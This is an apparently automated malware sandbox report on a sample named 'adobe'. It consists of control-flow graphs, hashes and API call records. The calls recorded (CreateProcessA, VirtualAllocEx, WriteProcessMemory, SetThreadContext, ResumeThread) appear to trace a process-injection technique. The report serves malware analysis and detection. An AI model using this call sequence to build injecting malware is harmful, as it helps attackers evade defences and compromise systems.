28133 5599473 ReadProcessMemory 28132->28133 28135 55994b7 28133->28135 28135->28048 28137 5599428 ReadProcessMemory 28136->28137 28139 55994b7 28137->28139 28139->28048 28140 13fd01c 28141 13fd034 28140->28141 28142 13fd08e 28141->28142 28145 5590abc 28141->28145 28154 5592c08 28141->28154 28146 5590ac7 28145->28146 28147 5592c79 28146->28147 28149 5592c69 28146->28149 28176 5590be4 28147->28176 28163 5592e6c 28149->28163 28168 5592da0 28149->28168 28172 5592d91 28149->28172 28150 5592c77 28157 5592c45 28154->28157 28155 5592c79 28156 5590be4 CallWindowProcW 28155->28156 28159 5592c77 28156->28159 28157->28155 28158 5592c69 28157->28158 28160 5592e6c CallWindowProcW 28158->28160 28161 5592d91 CallWindowProcW 28158->28161 28162 5592da0 CallWindowProcW 28158->28162 28160->28159 28161->28159 28162->28159 28164 5592e2a 28163->28164 28165 5592e7a 28163->28165 28180 5592e58 28164->28180 28166 5592e40 28166->28150 28170 5592db4 28168->28170 28169 5592e40 28169->28150 28171 5592e58 CallWindowProcW 28170->28171 28171->28169 28174 5592db4 28172->28174 28173 5592e40 28173->28150 28175 5592e58 CallWindowProcW 28174->28175 28175->28173 28177 5590bef 28176->28177 28178 5594309 28177->28178 28179 559435a CallWindowProcW 28177->28179 28178->28150 28179->28178 28181 5592e69 28180->28181 28183 5594292 28180->28183 28181->28166 28184 5590be4 CallWindowProcW 28183->28184 28185 55942aa 28184->28185 28185->28181 28186 144d340 28187 144d386 28186->28187 28191 144d520 28187->28191 28194 144d511 28187->28194 28188 144d473 28192 144d54e 28191->28192 28197 144ce58 28191->28197 28192->28188 28195 144ce58 DuplicateHandle 28194->28195 28196 144d54e 28195->28196 28196->28188 28198 144d588 DuplicateHandle 28197->28198 28199 144d61e 28198->28199 28199->28192 28200 1444668 28201 144467a 28200->28201 28202 1444686 28201->28202 28204 1444779 28201->28204 28205 144479d 28204->28205 28209 1444888 28205->28209 28213 1444878 28205->28213 28211 14448af 28209->28211 28210 144498c 28211->28210 28217 1444248 28211->28217 28214 14448af 28213->28214 28215 1444248 CreateActCtxA 28214->28215 28216 144498c 28214->28216 28215->28216 28218 1445918 CreateActCtxA 28217->28218 28220 14459db 28218->28220 28221 144afb8 28222 144afc7 28221->28222 28225 144b0b0 28221->28225 28230 144b0a0 28221->28230 28226 144b0c1 28225->28226 28227 144b0e4 28225->28227 28226->28227 28228 144b2e8 GetModuleHandleW 28226->28228 28227->28222 28229 144b315 28228->28229 28229->28222 28231 144b0e4 28230->28231 28232 144b0c1 28230->28232 28231->28222 28232->28231 28233 144b2e8 GetModuleHandleW 28232->28233 28234 144b315 28233->28234 28234->28222

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 316 5673d90-5673df2 call 5673110 322 5673df4-5673df6 316->322 323 5673e58-5673e84 316->323 324 5673dfc-5673e08 322->324 325 5673e8b-5673e93 322->325 323->325 330 5673e0e-5673e57 call 567311c 324->330 331 5673e9a-5673fd5 324->331 325->331 349 5673fdb-5673fe9 331->349 350 5673ff2-5674038 349->350 351 5673feb-5673ff1 349->351 356 5674045 350->356 357 567403a-567403d 350->357 351->350 358 5674046 356->358 357->356 358->358
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hiq$Hiq
                                                        • API String ID: 0-2624443307
                                                        • Opcode ID: 065d57cc5d82578715581e3cec15f35b4f69725561abc9f15711f49c16655267
                                                        • Instruction ID: 368010a8a601af2fb27aa13bd5d09d82c75769409e58cd516510d31cda55d8ef
                                                        • Opcode Fuzzy Hash: 065d57cc5d82578715581e3cec15f35b4f69725561abc9f15711f49c16655267
                                                        • Instruction Fuzzy Hash: 71816A70E002598FCF14DFA9C8946EEBBF6BF88310F24852AE409EB354DB745945CBA1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 391 55995b4-5599655 394 559968e-55996ae 391->394 395 5599657-5599661 391->395 402 55996b0-55996ba 394->402 403 55996e7-5599716 394->403 395->394 396 5599663-5599665 395->396 397 5599688-559968b 396->397 398 5599667-5599671 396->398 397->394 400 5599673 398->400 401 5599675-5599684 398->401 400->401 401->401 404 5599686 401->404 402->403 405 55996bc-55996be 402->405 409 5599718-5599722 403->409 410 559974f-5599809 CreateProcessA 403->410 404->397 407 55996e1-55996e4 405->407 408 55996c0-55996ca 405->408 407->403 411 55996cc 408->411 412 55996ce-55996dd 408->412 409->410 414 5599724-5599726 409->414 423 559980b-5599811 410->423 424 5599812-5599898 410->424 411->412 412->412 413 55996df 412->413 413->407 415 5599749-559974c 414->415 416 5599728-5599732 414->416 415->410 418 5599734 416->418 419 5599736-5599745 416->419 418->419 419->419 421 5599747 419->421 421->415 423->424 434 55998a8-55998ac 424->434 435 559989a-559989e 424->435 437 55998bc-55998c0 434->437 438 55998ae-55998b2 434->438 435->434 436 55998a0 435->436 436->434 440 55998d0-55998d4 437->440 441 55998c2-55998c6 437->441 438->437 439 55998b4 438->439 439->437 443 55998e6-55998ed 440->443 444 55998d6-55998dc 440->444 441->440 442 55998c8 441->442 442->440 445 55998ef-55998fe 443->445 446 5599904 443->446 444->443 445->446 448 5599905 446->448 448->448
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 055997F6
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 2f89be989351cfa1eecd1ecb5db705a29c3808a0b52c0f26897db26acad08715
                                                        • Instruction ID: 5998f255233cdc0227d1f1aa23350d5ceb499e06d6eb691a6c865b8d9f8f290d
                                                        • Opcode Fuzzy Hash: 2f89be989351cfa1eecd1ecb5db705a29c3808a0b52c0f26897db26acad08715
                                                        • Instruction Fuzzy Hash: 0BA15971D002599FEF24CFA9C841BEDBBB2FF48310F14856AE809A7250DB799985CF91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 449 55995c0-5599655 451 559968e-55996ae 449->451 452 5599657-5599661 449->452 459 55996b0-55996ba 451->459 460 55996e7-5599716 451->460 452->451 453 5599663-5599665 452->453 454 5599688-559968b 453->454 455 5599667-5599671 453->455 454->451 457 5599673 455->457 458 5599675-5599684 455->458 457->458 458->458 461 5599686 458->461 459->460 462 55996bc-55996be 459->462 466 5599718-5599722 460->466 467 559974f-5599809 CreateProcessA 460->467 461->454 464 55996e1-55996e4 462->464 465 55996c0-55996ca 462->465 464->460 468 55996cc 465->468 469 55996ce-55996dd 465->469 466->467 471 5599724-5599726 466->471 480 559980b-5599811 467->480 481 5599812-5599898 467->481 468->469 469->469 470 55996df 469->470 470->464 472 5599749-559974c 471->472 473 5599728-5599732 471->473 472->467 475 5599734 473->475 476 5599736-5599745 473->476 475->476 476->476 478 5599747 476->478 478->472 480->481 491 55998a8-55998ac 481->491 492 559989a-559989e 481->492 494 55998bc-55998c0 491->494 495 55998ae-55998b2 491->495 492->491 493 55998a0 492->493 493->491 497 55998d0-55998d4 494->497 498 55998c2-55998c6 494->498 495->494 496 55998b4 495->496 496->494 500 55998e6-55998ed 497->500 501 55998d6-55998dc 497->501 498->497 499 55998c8 498->499 499->497 502 55998ef-55998fe 500->502 503 5599904 500->503 501->500 502->503 505 5599905 503->505 505->505
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 055997F6
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 41cef98149b0ca4c6e014c3502c471c902d80f2f45bbff191d7a33840cc56bc4
                                                        • Instruction ID: 3c96b1b162bd285aa0d0fc45483d487779dc5d77b5609f79388e051811463a24
                                                        • Opcode Fuzzy Hash: 41cef98149b0ca4c6e014c3502c471c902d80f2f45bbff191d7a33840cc56bc4
                                                        • Instruction Fuzzy Hash: 1B916971D002599FEF24CFA9C841BEDBBB2FF48310F14856AE809A7250DB799985CF91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 506 144b0b0-144b0bf 507 144b0c1-144b0ce call 144aa74 506->507 508 144b0eb-144b0ef 506->508 513 144b0e4 507->513 514 144b0d0 507->514 510 144b0f1-144b0fb 508->510 511 144b103-144b144 508->511 510->511 517 144b146-144b14e 511->517 518 144b151-144b15f 511->518 513->508 561 144b0d6 call 144b348 514->561 562 144b0d6 call 144b339 514->562 517->518 519 144b161-144b166 518->519 520 144b183-144b185 518->520 522 144b171 519->522 523 144b168-144b16f call 144aa80 519->523 525 144b188-144b18f 520->525 521 144b0dc-144b0de 521->513 524 144b220-144b2e0 521->524 527 144b173-144b181 522->527 523->527 556 144b2e2-144b2e5 524->556 557 144b2e8-144b313 GetModuleHandleW 524->557 528 144b191-144b199 525->528 529 144b19c-144b1a3 525->529 527->525 528->529 531 144b1a5-144b1ad 529->531 532 144b1b0-144b1b9 call 144aa90 529->532 531->532 537 144b1c6-144b1cb 532->537 538 144b1bb-144b1c3 532->538 539 144b1cd-144b1d4 537->539 540 144b1e9-144b1f6 537->540 538->537 539->540 542 144b1d6-144b1e6 call 144aaa0 call 144aab0 539->542 547 144b1f8-144b216 540->547 548 144b219-144b21f 540->548 542->540 547->548 556->557 558 144b315-144b31b 557->558 559 144b31c-144b330 557->559 558->559 561->521 562->521
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0144B306
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_1440000_adobe.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 86a175490372c32b3b92fff0803ccc7d3a41f4ea6588347d98525d27c4361bbd
                                                        • Instruction ID: 5cbe836d0256d9d51107d797c29cdce873def17e387365294b5b23f7e4f9f46d
                                                        • Opcode Fuzzy Hash: 86a175490372c32b3b92fff0803ccc7d3a41f4ea6588347d98525d27c4361bbd
                                                        • Instruction Fuzzy Hash: A87134B0A00B058FE724DF6AD54475BBBF1FF88240F10892ED58A9BB60D774E849CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 563 5590be4-55942fc 566 55943ac-55943cc call 5590abc 563->566 567 5594302-5594307 563->567 575 55943cf-55943dc 566->575 568 5594309-5594340 567->568 569 559435a-5594392 CallWindowProcW 567->569 577 5594349-5594358 568->577 578 5594342-5594348 568->578 571 559439b-55943aa 569->571 572 5594394-559439a 569->572 571->575 572->571 577->575 578->577
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05594381
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: b728cfe2cc2115a25684883b88b637bf5ab4edf36a420cda03b25bd1921421f3
                                                        • Instruction ID: fd7d2699e0ea6c0fe76cc6e6c13fe345cb918c24c77100b8e08b0cf99ea3cd3d
                                                        • Opcode Fuzzy Hash: b728cfe2cc2115a25684883b88b637bf5ab4edf36a420cda03b25bd1921421f3
                                                        • Instruction Fuzzy Hash: 6F4108B4900245CFCB14CF99C448AAEBBF5FF88314F248959D519AB361D775A841CFA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 580 1444248-14459d9 CreateActCtxA 583 14459e2-1445a3c 580->583 584 14459db-14459e1 580->584 591 1445a3e-1445a41 583->591 592 1445a4b-1445a4f 583->592 584->583 591->592 593 1445a60 592->593 594 1445a51-1445a5d 592->594 596 1445a61 593->596 594->593 596->596
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 014459C9
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_1440000_adobe.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: de9ee1e3f2d51384fba744458e729a509dd3ed6fd68bb088280112a323304d91
                                                        • Instruction ID: b5e2e4a50f69e0b4a656e50477ee0e652bf177c7025acd0b5f4ead79c746aa97
                                                        • Opcode Fuzzy Hash: de9ee1e3f2d51384fba744458e729a509dd3ed6fd68bb088280112a323304d91
                                                        • Instruction Fuzzy Hash: BC41CFB4D00719CBEF24DFAAC884A9EBBB5BF49314F20805AD408AB251DB756946CF90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 597 144590d-14459d9 CreateActCtxA 599 14459e2-1445a3c 597->599 600 14459db-14459e1 597->600 607 1445a3e-1445a41 599->607 608 1445a4b-1445a4f 599->608 600->599 607->608 609 1445a60 608->609 610 1445a51-1445a5d 608->610 612 1445a61 609->612 610->609 612->612
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 014459C9
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_1440000_adobe.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 74c8e7a8bababb4ecddf3aa1c7dbff48636827ada15ac1e47f0e0cc71e21abb9
                                                        • Instruction ID: f2dd2a42ce1de4197c1b9636c8920ee7f335f336730226ee4c2dbfbfb035f4a9
                                                        • Opcode Fuzzy Hash: 74c8e7a8bababb4ecddf3aa1c7dbff48636827ada15ac1e47f0e0cc71e21abb9
                                                        • Instruction Fuzzy Hash: A941DFB4C00619CBEF24CFA9C885BDEBBB5BF48314F24805AD408AB261DB796946CF50

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 613 5599330-5599331 614 559938b-5599394 613->614 615 5599333-5599386 613->615 617 5599396-55993d5 WriteProcessMemory 614->617 615->617 620 5599388 615->620 621 55993de-559940e 617->621 622 55993d7-55993dd 617->622 620->614 622->621
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 055993C8
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 3f9157689fd00b39075cd8ced6fc822b692ad8e7e4f8a61145f960ce626149ef
                                                        • Instruction ID: 102ec6dc9fe72291973bc876dd2f0631436751fee14edb5f42cc32df086e317f
                                                        • Opcode Fuzzy Hash: 3f9157689fd00b39075cd8ced6fc822b692ad8e7e4f8a61145f960ce626149ef
                                                        • Instruction Fuzzy Hash: 9E2128719002499FDF14CFAAC985BEEBBF5FF88320F148429E919A7240D7799940CBA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 626 5599338-5599386 628 5599388-5599394 626->628 629 5599396-55993d5 WriteProcessMemory 626->629 628->629 632 55993de-559940e 629->632 633 55993d7-55993dd 629->633 633->632
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 055993C8
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 762e574caa57b42894572619a35e093c2aeb230fb30d2434fbf94b17413d9284
                                                        • Instruction ID: 13319567b9dd4bbb89111069c71c948e86129b0257b6f9ab507ecd3f0ee69048
                                                        • Opcode Fuzzy Hash: 762e574caa57b42894572619a35e093c2aeb230fb30d2434fbf94b17413d9284
                                                        • Instruction Fuzzy Hash: 7B2128719002499FDF10CFAAC841BEEBBF5FF48320F108429E919A7240D7799940CBA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 637 5599198-5599199 638 559919b-55991eb 637->638 639 55991f3-55991f9 637->639 641 55991fb-559922b Wow64SetThreadContext 638->641 646 55991ed-55991f0 638->646 639->641 644 559922d-5599233 641->644 645 5599234-5599264 641->645 644->645 646->639
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0559921E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 68effd1d9a23d0f80d3465267c44e433965eece0a689afdac4af90b61402a7a9
                                                        • Instruction ID: 1143bdf8f3e84161e0fb4864aacaa35fee229edccb6e55d72dbcdc0be556fe15
                                                        • Opcode Fuzzy Hash: 68effd1d9a23d0f80d3465267c44e433965eece0a689afdac4af90b61402a7a9
                                                        • Instruction Fuzzy Hash: FD213771D002098FDB14DFAAC485BAEBBF4FF88324F14842AD459A7240DB789945CFA5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 656 5599422-55994b5 ReadProcessMemory 660 55994be-55994ee 656->660 661 55994b7-55994bd 656->661 661->660
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 055994A8
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: b6efde64032663fc51e6ebd1ec52e777335a39c31be09a0cbe56c682af589af2
                                                        • Instruction ID: 2f8ca035908f05d943f17e0f3a7b5a8b0c0e0e4d9828e01b489a180f135f7b00
                                                        • Opcode Fuzzy Hash: b6efde64032663fc51e6ebd1ec52e777335a39c31be09a0cbe56c682af589af2
                                                        • Instruction Fuzzy Hash: A6213CB1C002499FDF10DF9AC841AEEFBF5FF88320F14842AE519A7240D7799940DBA5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 650 144ce58-144d61c DuplicateHandle 652 144d625-144d642 650->652 653 144d61e-144d624 650->653 653->652
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0144D54E,?,?,?,?,?), ref: 0144D60F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_1440000_adobe.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 348cfd187ebb84a5247dc8459fe07a87175c8bef8c4c7215c1519173c8de6305
                                                        • Instruction ID: c730e7264b4b2b5c10be83f7318e5650e5e0d1fb7b82908645440ad138d14abf
                                                        • Opcode Fuzzy Hash: 348cfd187ebb84a5247dc8459fe07a87175c8bef8c4c7215c1519173c8de6305
                                                        • Instruction Fuzzy Hash: 5A21E5B5D00248DFDB10CF9AD884AEEBFF4EB48320F14841AE918A7350D375A950CFA5
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 055994A8
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: d3ddd99068a790d8a5582d9b65bea9fdbfa8c1e8b090f0cbc454f0d3c634c13c
                                                        • Instruction ID: 8f0ca28d3f40ede4181caf3fcc1029875c70a90780c005f934668df1327c5045
                                                        • Opcode Fuzzy Hash: d3ddd99068a790d8a5582d9b65bea9fdbfa8c1e8b090f0cbc454f0d3c634c13c
                                                        • Instruction Fuzzy Hash: C92139B1C002499FDF10CFAAC840AEEFBF5FF88320F10842AE519A7240D7799940CBA5
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0559921E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: a9e95df47293bebf14b8cc284146421e427b4282761193c409973c28cf5fad2f
                                                        • Instruction ID: d79390ea023246a3de57037bcc3bd90e3beef990dbff456bcf2a4447a9925129
                                                        • Opcode Fuzzy Hash: a9e95df47293bebf14b8cc284146421e427b4282761193c409973c28cf5fad2f
                                                        • Instruction Fuzzy Hash: 68213471D002098FDB14CFAAC485BAEBBF4FF88324F14842AD419A7240DB789944CFA5
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0144D54E,?,?,?,?,?), ref: 0144D60F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_1440000_adobe.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: f57676908e08bce61c0895ad7254d7f82416237099868e066d1512405fc793bc
                                                        • Instruction ID: 1361ab204aa9b943095323c89b53d6497d1ab8feb2d59c9a50d29f197fd67d16
                                                        • Opcode Fuzzy Hash: f57676908e08bce61c0895ad7254d7f82416237099868e066d1512405fc793bc
                                                        • Instruction Fuzzy Hash: 2521E4B5D00249DFDB10CF9AD984AEEBBF8EB48320F14841AE918A3310D378A954CF65
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 055992E6
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 1573c3b11581bb86309393e0f49ba573fa79ccbdceb107299d5de5aa09ea371f
                                                        • Instruction ID: b9d03dbb8e12c177dcd81d0efcf9f1555411c1c6cdb1b561e3af60a5d3070d55
                                                        • Opcode Fuzzy Hash: 1573c3b11581bb86309393e0f49ba573fa79ccbdceb107299d5de5aa09ea371f
                                                        • Instruction Fuzzy Hash: 24216A728002498BCF10DFAAC844BEEFFF5FF88320F148419E419A7250DB799900CBA0
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 055992E6
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 56616698a993b9c2d6a81cf4d22312cdac01070cb74f4d71ab91a76ef0049b59
                                                        • Instruction ID: 3082b052f1288d0a838d12ca629b7ae3ff0a6ccc02db958b7b9d0e1eaffcfd6f
                                                        • Opcode Fuzzy Hash: 56616698a993b9c2d6a81cf4d22312cdac01070cb74f4d71ab91a76ef0049b59
                                                        • Instruction Fuzzy Hash: 071126719002499FDF10DFAAD844AEEBFF5EF88320F148819E519A7250CB7A9940CBA5
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: aff6f4de460ab89532991d7fa3c34bad35769f14c54f12339b0ace11874dd73d
                                                        • Instruction ID: 8cb4b8e24f0749790357b86be595f30794109d9f440617e9f01782e2cf202413
                                                        • Opcode Fuzzy Hash: aff6f4de460ab89532991d7fa3c34bad35769f14c54f12339b0ace11874dd73d
                                                        • Instruction Fuzzy Hash: 2C112871D002498BDB14DFAAC8457EEFBF8FB88324F24881AD519A7240DA79A944CB95
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5590000_adobe.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: dfaba2d09d22d9d5f8130bb7287eb9a651e88a630b4a7ddc4863fe5ee38d8ee0
                                                        • Instruction ID: 36b6af2ef2aac5a6e24f5de47f80ceb8a6778a30d203a952cca065fbf13140c0
                                                        • Opcode Fuzzy Hash: dfaba2d09d22d9d5f8130bb7287eb9a651e88a630b4a7ddc4863fe5ee38d8ee0
                                                        • Instruction Fuzzy Hash: 16113A71D002498FDB14DFAAC4457EEFBF8FF88324F14841AD519A7240DB796944CB95
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0144B306
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_1440000_adobe.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 05f307f28f257f59c1ec284be828dbe2fc401be307c5313c175e4747996feebd
                                                        • Instruction ID: 573be9b46ca300327f29345412db69997f20bb9b13e64c9266fb1bb5dad3a831
                                                        • Opcode Fuzzy Hash: 05f307f28f257f59c1ec284be828dbe2fc401be307c5313c175e4747996feebd
                                                        • Instruction Fuzzy Hash: F011DFB6C006498FDB10CF9AD844ADEFBF8EF88220F14851AD919A7310D379A545CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ead75eb04be1eb5f818ec0182ce4c966f73ce844b056cb57e5bcc9f128ec2840
                                                        • Instruction ID: 1713befbf72e71deacd19ee9e19ab9128389f1ab2892414415f52e92e6b0b7c0
                                                        • Opcode Fuzzy Hash: ead75eb04be1eb5f818ec0182ce4c966f73ce844b056cb57e5bcc9f128ec2840
                                                        • Instruction Fuzzy Hash: 002195B6F0021A8BDF05DBB8C9416EE77B6EF98200F14452AD405E7350EB349905D771
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
